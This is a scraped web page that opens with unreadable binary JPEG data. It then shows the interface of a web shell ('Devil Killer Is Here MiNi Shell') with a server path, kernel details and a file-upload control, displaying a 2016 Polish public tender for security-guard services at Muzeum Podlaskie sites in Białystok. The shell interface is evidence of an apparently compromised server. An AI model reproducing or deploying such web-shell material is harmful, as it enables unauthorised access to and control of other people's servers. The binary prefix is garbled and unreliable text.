JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160121/14384-N-2016.html

<p class="kh_header"><b>Białystok: Usługa dozoru mienia - ochrony obiektu przed kradzieżą, włamaniem z zewnątrz, pożarem i dewastacją w obiektach  Muzeum Podlaskiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 14384 - 2016; data zamieszczenia: 21.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa dozoru mienia - ochrony obiektu przed kradzieżą, włamaniem z zewnątrz, pożarem i dewastacją w obiektach  Muzeum Podlaskiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa dozoru mienia - ochrony obiektów Zamawiającego  przed kradzieżą, włamaniem z zewnątrz, pożarem i dewastacją - CPV 79710000-4 (usługi ochroniarskie).
Miejsce i wymiar realizacji usługi: 
	Muzeum Ikon w Supraślu przy ulicy Klasztornej 1 w formie jednego posterunku   wewnętrznego jednoosobowego:
	16-godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	całodobowo: w poniedziałki oraz w święta: 1 stycznia, 6 stycznia, pierwszy i drugi  dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało, 15 sierpnia,1 Listopada  oraz  w pierwszy i drugi dzień Świąt Bożego Narodzenia  
	Ratuszu - siedzibie Muzeum Podlaskiego w Białymstoku przy Rynku Kościuszki  10 w formie jednego posterunku wewnętrznego jednoosobowego:
	16- godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	całodobowo: w poniedziałki oraz w święta: 1 stycznia, 6 stycznia, pierwszy i drugi  dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało, 15 sierpnia,1 Listopada  oraz  w pierwszy i drugi dzień Świąt Bożego Narodzenia .
	Muzeum Wnętrz Pałacowych w Choroszczy przy ul. Pałacowej 2 w  formie jedne-go posterunku    wewnętrznego jednoosobowego:
	16-godzinego codziennie od godz.17:00 do 9:00 dnia następnego
	całodobowo w poniedziałki oraz w święta: 1 stycznia, 6 stycznia, pierwszy i drugi dzień Świąt Wielkanocnych, 1  Maja, Boże Ciało, 15 sierpnia,1 Listopada, pierwszy i drugi dzień Świąt Bożego Narodzenia
	Muzeum w Bielsku Podlaskim przy ulicy Mickiewicza 45 w formie jednego  poste-runku wewnętrznego jednoosobowego:
	16-godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	    całodobowo: w poniedziałki oraz w święta: 1 stycznia, 6 stycznia, pierwszy i drugi  dzień Świąt  Wielkanocnych, 1 Maja,  Boże Ciało, 15 sierpnia,1 Listopada oraz   w pierwszy i drugi  dzień Świąt Bożego Narodzenia,  
	Muzeum w Tykocinie ul. Kozia 2 :
	Dom Talmudyczny  w formie jednego posterunku wewnętrznego jednoosobowego:
	   16-godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	całodobowo: w poniedziałki oraz w święta: 1 stycznia, 6 stycznia , pierwszy i drugi dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało, 1 Listopada, oraz  w pierwszy i drugi   dzień Świąt Bożego Narodzenia 
	Synagoga w formie jednego posterunku wewnętrznego jednoosobowego:
	16-godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	    całodobowo: w poniedziałki oraz w święta: 1 stycznia, 6 stycznia , pierwszy i drugi dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało, 1 Listopada oraz  w pierwszy i drugi  dzień Świąt Bożego Narodzenia 
	Muzeum Historycznym w Białymstoku przy ulicy Warszawskiej 37 w formie jed-nego posterunku wewnętrznego jednoosobowego:
	16-godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	całodobowo: w poniedziałki oraz w święta: 1 stycznia, pierwszy i drugi dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało,15 sierpnia, 1 Listopada, pierwszy i drugi dzień Świąt Bożego Narodzenia,
	Muzeum Rzeźby Alfonsa Karnego w Białymstoku przy ulicy Świętojańskiej 17 w formie jednego posterunku wewnętrznego jednoosobowego:
	16-godzinnego codziennie od godz.17:00 do 9:00 dnia następnego
	całodobowo: w poniedziałki oraz w święta: 1 stycznia, 6 stycznia pierwszy i drugi dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało, 15 sierpnia, 1 Listopada, w pierwszy i drugi dzień Świąt Bożego Narodzenia 
	Białostockim Muzeum Wsi w Osowiczach w budynku administracyjnego wraz z otoczeniem oraz budynku wiatraka i zamieszkałej zagrody leśnej w Białostockim Muzeum Wsi w Osowiczach w formie jednego posterunku wewnętrznego jednooso-bowego:
	16- godzinnego codziennie od godz.15:00 do 7:00 dnia następnego od poniedział-ku do piątku
	całodobowo: w soboty i niedziele oraz w święta: 1 stycznia, 6 stycznia pierwszy i drugi dzień Świąt Wielkanocnych, 1 Maja, Boże Ciało, 15 sierpnia,1 Listopada, 11 Listopada, pierwszy i drugi dzień Świąt Bożego Narodzenia.
	Posterunek obsługiwany przez jednego strażnika znajduje się w pomieszczeniu w bu-dynku biura Białostockiego Muzeum Wsi. 
	W pomieszczeniu tym znajduje się wymagająca stałego nadzoru centrala wizyjnego systemu monitoringu złożonego z kamer usytuowanych na terenie całego Białostoc-kiego Muzeum Wsi. Nadzór obejmuje również centralę systemu przeciwpożarowe-go, którego czujki rozmieszczone są w budynkach na terenie całego skansenu. 
	Ochrona obejmuje budynek biura skansenu, stolarnię, wiatę wraz ze składem maga-zynowym drewna, wiatrak z Rzędzian oraz zagrodę z leśniczówką (trzy obiekty). Strażnicy pełniący dyżur zobowiązani są do prowadzenia nadzoru nad bramą wjaz-dową do skansenu przy kasie.
	Podczas nadzoru wymagana jest stała współpraca z posterunkiem znajdującym się na terenie skansenu w budynku z Piszczat. Do łączności między nimi służy telefon ko-mórkowy stanowiący własność firmy ochroniarskiej.

Pracownicy ochrony powinni bezwzględnie w czasie pełnienia dyżuru być wyposażeni w służbowe umundurowanie, składające się z obuwia, spodni, marynarki i czapki w kolorze czarnym. Na marynarkę powinni mieć założona kamizelkę z napisem: Ochrona. W widocznym miejscu do odzieży przymocowany powinien być identyfikator z imieniem i nazwiskiem oraz nazwą firmy ochroniarskiej.

	Białostockie Muzeum Wsi w Osowiczach w wydzielonym pomieszczeniu w budynku z Piszczat Piotrowięt w formie jednego 24- godzinnego posterunku obsługiwane-go przez jednego strażnika we wszystkie dni w roku. 

	Nadzór nad budynkami, a w szczególności: kontrolowanie zamknięcia drzwi i okien, sprawdzanie czy nie występują w nich uszkodzenia wynikających z dewastacji lub na skutek działania innych czynników, np. pogody. Obowiązki związane z realizacją umowy obejmują znajdujące się na terenie skansenu budynki przeznaczone do po-nownego złożenia. 
	Nadzór nad systemami: antywłamaniowym, przeciwpożarowym oraz monitoringiem wraz z oświetleniem we współpracy z posterunkiem znajdującym się w budynku biura skansenu. 
	Nadzór nad systemami alarmowymi obsługiwanymi z centrali w chałupie z Pieczysk, ich włączanie i wyłączanie stosownie do zaistniałych potrzeb. 
	Nadzór nad osobami zwiedzającymi skansen w zakresie ochrony pożarowej - prze-strzegania zakazu palenia tytoniu. 
	Nadzór nad bramami, a w szczególności znajdującymi się przy zagrodzie z budyn-kiem mieszkalnym z Uszy oraz przy Folwarku Nadawki - ich zamykanie i otwieranie zgodnie z godzinami otwarcia skansenu w sezonie, kiedy otwarte są wystawy. 
	Nadzór nad stanem ogrodzenia - zgłaszanie specjaliście d/s budowlanych zatrudnio-nym w skansenie jego uszkodzeń. 
	Nadzór nad właściwym wypełnianiem warunków umowy wynikających z wynajmu zagrody z budynkiem inwentarskim z Bryk i hodowanych na jej terenie zwierząt. Każdorazowe zgłaszanie faktu opuszczenia terenu wynajmowanej zagrody przez zwierzęta ich właścicielowi oraz odnotowanie tego faktu w książce pełnienia dozoru.
Strażnicy pełniący dyżur zobowiązani są do stałego patrolowania terenu, co jest po-świadczane rejestracją przenośnego czytnika transponderów zbliżeniowych.
Do łączności z posterunkiem w biurze skansenu i z służbami alarmowymi strażnicy po-winni posiadać sprawne telefony komórkowe, których właścicielem jest firma ochro-niarska.
Strażnicy podczas pełnienia służby są zobowiązani do noszenia właściwego umunduro-wania w kolorze czarnym oraz kamizelki z napisem: Ochrona. W widocznym miejscu do odzieży muszą mieć przymocowany identyfikator z imieniem i nazwiskiem oraz na-zwą firmy ochroniarskiej.
Strażnicy są zobowiązani do utrzymania czystości w pomieszczeniu, w którym pełnią dozór.

Zamawiający będzie uprawniony do zlecenia dodatkowych godzin ochrony, dozoru mienia przy obsłudze  imprez muzealnych, jarmarków, festynów, nocy muzeów, itd. 

	Przedmiot zamówienia wykonywany będzie wyłącznie przez osoby wyznaczone przez Wykonawcę do realizacji zadania, bez możliwości wprowadzenia osób trzecich oraz co najmniej 12 - miesięcznym doświadczeniem pracy w ochronie. Wykaz pra-cowników Wykonawca zobowiązany jest przedstawić Zamawiającemu najpóźniej w dniu podpisania umowy. O każdej zmianie obsady pracowników Wykonawca jest zo-bowiązany pisemnie powiadomić Zamawiającego najpóźniej 24 godziny  przed zmiana. Przy zmianie obsady Wykonawca zobowiązany będzie do przedłożenia za-świadczeń o niekaralności. 
	Wykonawca oraz osoby za pośrednictwem, których będzie wykonywał przedmiot zamówienia, zobowiązani są do zachowania w tajemnicy wszystkich informacji uzy-skanych w związku z realizacją zamówienia, zarówno w trakcie jego realizacji jak i po jego zakończeniu.
	Zamawiający informuje, że obiekty muzealne objęte przedmiotem postępowania są wyposażone w  systemy p.pożarowe i systemy p.włamaniowe.  Pierwsze przeszkole-nie pracowników wyznaczonych do realizacji przedmiotu zamówienia jest bezpłatne, każde następne jest płatne przez Wykonawcę wg stawek obowiązujących w firmach obsługujących ww systemy w Muzeum Podlaskim.
	Wykonawca, któremu zostanie udzielone zamówienie, będzie musiał mieć swego sta-łego przedstawiciela w Białymstoku w celu ułatwienia realizacji przedmiotu umowy. Powinna być to osoba dyspozycyjna, która w możliwie najkrótszym czasie, nie dłuż-szym niż 2 godziny, pojawi się na danym posterunku, jeśli Zamawiający tego zażąda. Przedstawiciel Wykonawcy powinien przynajmniej raz w miesiącu przeprowadzać kontrolę podległych pracowników, stanowisk pracy w miejscu pracy oraz książek pełnienia dozoru. Każda kontrola ma być odnotowana w Książce dozoru każdego chronionego obiektu.
	Zamawiający, z zastrzeżeniem opisu ubioru pracowników ochrony na terenie BMW, wymaga aby strażnicy podczas pełnienia służby byli umundurowani (obuwie, spod-nie, koszula, marynarka). W widocznym miejscu do odzieży muszą mieć przymoco-wany identyfikator z imieniem i nazwiskiem oraz nazwą firmy ochroniarskiej. 
	Zamawiający wymaga od Wykonawcy aby wyposażył swoich pracowników w spraw-ne telefony komórkowe oraz latarki. 
	Zamawiający zastrzega sobie prawo do kontroli posterunków o każdej porze przez upoważnionych przez siebie pracowników.
	Na wniosek Wykonawcy Zamawiający umożliwi wizję lokalną. Przedstawiciel (przedstawiciele) Wykonawcy może przeprowadzić wizję lokalną obiektów, których dotyczy zamówienie, w celu uzyskania informacji dla poprawnego przygotowania oferty. Nie przeprowadzenie wizji lokalnej przez Wykonawcę nie spowoduje odrzucenia oferty. Wykonawcy, którzy będą chcieli przeprowadzić wizję lokalną zobowiązani są do wcześniejszego (min. z jednodniowym wyprzedzeniem) pisemnego zgłoszenia na adres: Muzeum Podlaskie w Białymstoku Ratusz - Rynek Kościuszki 10, 15-426 Białystok lub faksem na numer 86 740 77 39 podając datę i godzinę odpowiadającą Wykonawcy oraz dane do kontaktu numer faksu i telefonu w celu ustalenia terminu wizji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Muzeum przewiduje zlecanie dodatkowych godzin ochrony fizycznej na posterunkach oraz podczas imprez m.in Jarmarki, festyny itp. Liczba szacowanych dodatkowych godzin wynosi 2000.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium ( przepisy art. 45. PZP)
Zamawiający żąda wniesienia wadium przed upływem terminu składania ofert w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych)

2.	Forma wadium:
Wadium może być wniesione w następujący sposób:
a)	Pieniądzu
b)	Poręczeniach bankowych 
c)	Gwarancjach bankowych
d)	Gwarancjach ubezpieczeniowych
e)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z pózn. Zm.)
f)	W przypadku składania wadium w formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalna i płatna na pierwsze pisemne żądanie Zamawiającego
g)	w przypadku wadium wnoszonego w pieniądzu, wadium należy wpłacić na konto w  PeKaO  S.A O/Białystok   nr 04 1240 5211 1111 0000 4919 5527</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca prowadzi działalność gospodarczą w zakresie objętym przedmiotem zmówienia i posiada koncesję wydaną przez MSWiA na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. z 2005 r. nr 145, poz.1221 z póź.zm.) w zakresie usług ochrony mienia ważną przez cały okres realizacji umowy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony,  jeżeli Wykonawca wykonał ( rozpoczął i za-kończył) lub wykonuje (rozpoczął i aktualnie realizuje) w okresie ostatnich 3 lat przed dniem składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 2 usługi ochrony obiektów (ochrona obiektów użyteczności publicznej o wartości min. 200.000,00 zł brutto każda, trwająca nieprzerwanie przez okres co naj-mniej 12 miesięcy) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywani oceny spełniania przedmiotowego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wy-magane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada aktualna polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę nie mniejszą niż 2.000.000,00zł lub oświadczenie, że z dniem podpisania umowy Wykonawca posiadać będzie ubezpieczenie na kwotę nie mniejszą niż 2.000.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
